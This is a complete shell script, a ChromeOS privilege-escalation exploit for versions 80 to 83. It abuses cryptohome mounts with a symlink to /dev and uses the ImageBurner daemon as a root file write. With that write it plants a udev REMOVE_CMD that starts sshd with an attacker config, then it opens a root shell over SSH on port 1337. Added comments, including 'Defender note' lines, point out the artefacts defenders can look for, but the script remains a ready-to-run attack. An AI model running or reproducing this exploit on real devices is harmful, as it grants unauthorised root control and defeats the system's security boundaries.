# privesc v80 hyperskid NO ARC NO SSHFS NO BINARIES
# made by Rory McNamara and OlyB, improved by rainestorme
# works on v80 through v83
# https://crbug.com/1072233 (udev command execution)
# https://crbug.com/1099390 (ImageBurner file write)
#######################################
# Ask cryptohome over the system bus for the sanitized ("salty") form of a
# username and print the string value(s) found in the reply.
# Arguments: $1 - username to sanitize
# Outputs:   the double-quoted string field(s) of the dbus-send reply, stdout
# Returns:   status of the last pipeline stage (cut)
#######################################
get_salty_username() {
  local reply
  reply=$(dbus-send --system --print-reply --dest=org.chromium.Cryptohome /org/chromium/Cryptohome org.chromium.CryptohomeInterface.GetSanitizedUsername "string:$1")
  printf '%s\n' "$reply" | grep string | cut -d'"' -f2
}
#######################################
# Encode a username as a length-prefixed, comma-separated byte list in the
# form dbus-send's array:byte: argument expects: "0x<len-hex>,0x..,0x..".
# Globals:   user, packeduser, packedlen (all written; not local, on purpose
#            to keep the original's side effects)
# Arguments: $1 - username to encode
# Outputs:   the encoded byte list on stdout (e.g. "0x3,0x61,0x62,0x63")
# Returns:   status of printf (0)
#######################################
dbus_pack_user() {
  user=$1
  # One "0x%02x," cell per byte, -v so repeated bytes are never collapsed.
  packeduser=$(printf '%s' "${user}" | hexdump -v -e '1/1 "0x%02x,"')
  # Drop the trailing comma left by the format string (empty input stays empty).
  packeduser=${packeduser%,}
  # Length prefix is the byte count in lower-case hex, without 0x.
  packedlen=$(printf '%x' "${#user}")
  printf '0x%s,%s\n' "${packedlen}" "${packeduser}"
}
#######################################
# Prepare the sshd that writefiles later gets launched as root: generate a
# throwaway host key under /tmp on first run, drop its public half where the
# generated config looks for root's authorized keys, and write that config.
# Globals:   none read; creates /tmp/ssh_host_rsa_key{,.pub}, /tmp/root/k and
#            /tmp/sshd_config; deletes the chronos user's known_hosts
# Arguments: none
# Returns:   status of the final rm -f
# Defender note: every artefact of this stage is plain filesystem state —
# an sshd_config under /tmp whose AuthorizedKeysFile points into /tmp, a host
# key under /tmp and a non-default Port — all of which can be checked for.
#######################################
stage_sshd() {
# set up a fake ssh server using the system sshd and enabling passwordless login for root with the provided key
# Key material is generated only once; the same private key is reused by
# runasroot as the client identity (-i /tmp/ssh_host_rsa_key).
if [ ! -e /tmp/ssh_host_rsa_key ]; then
ssh-keygen -f /tmp/ssh_host_rsa_key -N '' -t rsa >/dev/null
# No -p and no set -e: an existing /tmp/root/ just makes mkdir complain.
mkdir /tmp/root/
cp /tmp/ssh_host_rsa_key.pub /tmp/root/k
fi
# '<<-' strips leading tabs only; the config lines below carry none.
# StrictModes no is what lets sshd accept a key file living under /tmp.
cat > /tmp/sshd_config <<-EOF
AuthorizedKeysFile /tmp/%u/k
StrictModes no
HostKey /tmp/ssh_host_rsa_key
Port 1337
EOF
# Forget previously seen host keys so the freshly generated one is accepted.
rm -f /home/chronos/user/.ssh/known_hosts
}
#######################################
# Connect to the sshd started by the udev REMOVE_CMD (see writefiles): port
# 1337 and the client key match what stage_sshd wrote into /tmp/sshd_config.
# Arguments: "$@" - optional command to run remotely; with none, ssh opens an
#            interactive session
# Returns:   ssh's exit status
# NOTE(review): the `[email protected]` token reads like an artefact of the
# page's e-mail obfuscation rather than the script's original text — confirm
# the user@host value against the upstream source before relying on it.
#######################################
runasroot() {
ssh -p 1337 -i /tmp/ssh_host_rsa_key -o StrictHostKeyChecking=no [email protected] "$@"
}
#######################################
# Call cryptohome's MountEx over the system bus with three raw byte arrays.
# Globals:   packeduser (written; not local)
# Arguments: $1 - length-prefixed byte list as produced by dbus_pack_user
# Returns:   dbus-send's exit status; the reply itself is discarded
# The first array is "0x12," followed by the packed username; the other two
# are fixed and both embed the bytes 0x74,0x65,0x73,0x74 (ASCII "test"),
# presumably a placeholder label — the exact message schema is not visible
# here, so treat the byte meanings as unverified.
#######################################
MountEx() {
packeduser=$1
dbus-send --system --print-reply --dest=org.chromium.Cryptohome /org/chromium/Cryptohome org.chromium.CryptohomeInterface.MountEx \
array:byte:0x12,${packeduser} \
array:byte:0xa,0x16,0xa,0xe,0x8,0x0,0x1a,0xa,0x8,0x1,0x10,0x1,0x18,0x1,0x20,0x1,0x28,0x0,0x12,0x4,0x74,0x65,0x73,0x74 \
array:byte:0x8,0x0,0x12,0x12,0xa,0x10,0xa,0x8,0x8,0x0,0x12,0x4,0x74,0x65,0x73,0x74,0x12,0x4,0x74,0x65,0x73,0x74,0x20,0x0,0x30,0x0 >/dev/null
}
#######################################
# Call cryptohome's UnmountEx over the system bus with an empty byte array.
# Arguments: none
# Returns:   dbus-send's exit status; the reply is discarded
#######################################
UnmountEx() {
dbus-send --system --print-reply --dest=org.chromium.Cryptohome /org/chromium/Cryptohome org.chromium.CryptohomeInterface.UnmountEx \
array:byte: >/dev/null
}
#######################################
# Mount the throwaway user's cryptohome, swap its GCache/v2 directory for a
# symlink to /dev, then unmount and mount again. The function name says the
# remount is what yields "/dev access"; the cryptohome-side behaviour that
# makes the symlink matter is not visible in this file.
# Globals:   tgtuser, salty_user (read); packed, gcache (written, not local)
# Arguments: none
# Returns:   status of the final MountEx
# Defender note: a symlink inside a user profile (GCache/v2) pointing at /dev
# is the durable artefact of this step.
#######################################
getdevaccess() {
packed=$(dbus_pack_user ${tgtuser})
gcache="/home/user/${salty_user}/GCache/v2"
MountEx ${packed}
# Remove whatever is at the path (directory or file); errors are silenced
# because only one of the two can succeed.
rmdir ${gcache} 2>/dev/null
rm ${gcache} 2>/dev/null
ln -s /dev ${gcache}
# Unmount/remount cycle with the symlink in place.
UnmountEx
MountEx ${packed}
}
#######################################
# Write a line of text to an arbitrary path by way of the ImageBurner daemon
# (header: https://crbug.com/1099390, "ImageBurner file write"): the content
# goes to a temp file in Downloads, /dev/sdz is made a symlink to the target
# (creating it under /dev needs the access set up by getdevaccess), and
# BurnImage is asked to copy the temp file onto /dev/sdz. The function name
# asserts the daemon performs that copy as root; this file does not show it.
# Globals:   salty_user (read); tempfile (written, not local)
# Arguments: $1 - content to write (unquoted: subject to word splitting)
#            $2 - destination path, reached through the /dev/sdz symlink
# Returns:   status of the final rm
# Defender note: a BurnImage request whose device argument is a symlink to a
# non-removable path is the observable of this primitive.
#######################################
root_filewrite() {
tempfile="/home/chronos/u-${salty_user}/Downloads/filewrite"
echo $1 > ${tempfile}
ln -s $2 /dev/sdz
dbus-send --system --print-reply --dest=org.chromium.ImageBurner /org/chromium/ImageBurner org.chromium.ImageBurnerInterface.BurnImage string:${tempfile} string:/dev/sdz > /dev/null
# No completion signal is awaited; the fixed delay is what keeps the symlink
# and temp file alive long enough for the daemon to finish.
sleep 0.5
rm /dev/sdz ${tempfile}
}
#######################################
# Perform the three privileged writes that turn the file-write primitive into
# command execution (header: https://crbug.com/1072233, "udev command
# execution"): (1) a udev database entry for PCI device 0000:00:00.0 whose
# REMOVE_CMD starts sshd with the config from stage_sshd; (2) "1" to that
# device's sysfs remove node, which raises the remove event udev acts on;
# (3) "1" to the bus rescan node so the device is re-enumerated afterwards.
# Globals:   none directly (root_filewrite reads salty_user)
# Arguments: none
# Returns:   status of the last root_filewrite
# Defender note: a udev data entry under /run/udev/data carrying a REMOVE_CMD
# that launches a shell is the artefact to look for.
#######################################
writefiles() {
root_filewrite "E:REMOVE_CMD=/bin/sh -c '/usr/sbin/sshd -f /tmp/sshd_config'" /run/udev/data/+pci\:0000\:00\:00.0
root_filewrite 1 /sys/devices/pci0000\:00/0000\:00\:00.0/remove
root_filewrite 1 /sys/devices/pci0000\:00/pci_bus/0000\:00/rescan
}
# Entry point. A throwaway username is built from 8 random bytes rendered as
# hex plus a fixed "@test.test" domain, its sanitized form is fetched from
# cryptohome, and the stages above run in order. None of the stages is
# checked for success (no set -e), so a failure early on surfaces only as a
# later stage misbehaving.
tgtuser=$(hexdump -e '1/8 "%02x\n"' -n 8 /dev/urandom)@test.test
salty_user="$(get_salty_username ${tgtuser})"
echo "Staging sshd..."
stage_sshd
echo "Getting /dev access..."
getdevaccess
echo "Writing files..."
writefiles
echo "Providing root shell..."
# With no arguments, runasroot opens an interactive ssh session.
runasroot